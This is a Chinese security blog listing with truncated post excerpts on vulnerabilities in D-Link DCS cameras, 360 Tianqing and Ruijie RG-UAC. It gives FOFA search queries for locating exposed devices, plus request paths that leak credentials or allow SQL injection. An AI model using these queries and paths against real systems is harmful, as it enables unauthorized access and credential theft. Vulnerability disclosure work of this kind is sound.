描述
fofa搜:app=”D_Link-DCS-2530L”
拼接路径:/config/getuser?index=0
转载请注明:Adminxe's Blog » D-Link DCS系列监控账...
Adminxe
4年前 (2021-04-17) 2935℃ 0评论
9喜欢
1、注入:
描述
fofa title=”360新天擎”
POC & 利用
/api/dp/rptsvcsyncpoint?ccid=1
2、信息泄露
描述
/api/dbstat/get...
Adminxe
4年前 (2021-04-17) 4784℃ 0评论
6喜欢
0x00 前言
2021年3月8日,锐捷RG-UAC统一上网行为管理审计系统存在信息泄露漏洞,攻击者可以通过审查网页源代码获取到用户账号和密码,导致管理员用户认证信息泄露。
这个漏洞让我想到10年的审查元素大法,确实逻辑有点……
0x01 影响范围
...
Adminxe
4年前 (2021-03-09) 5456℃ 1评论
39喜欢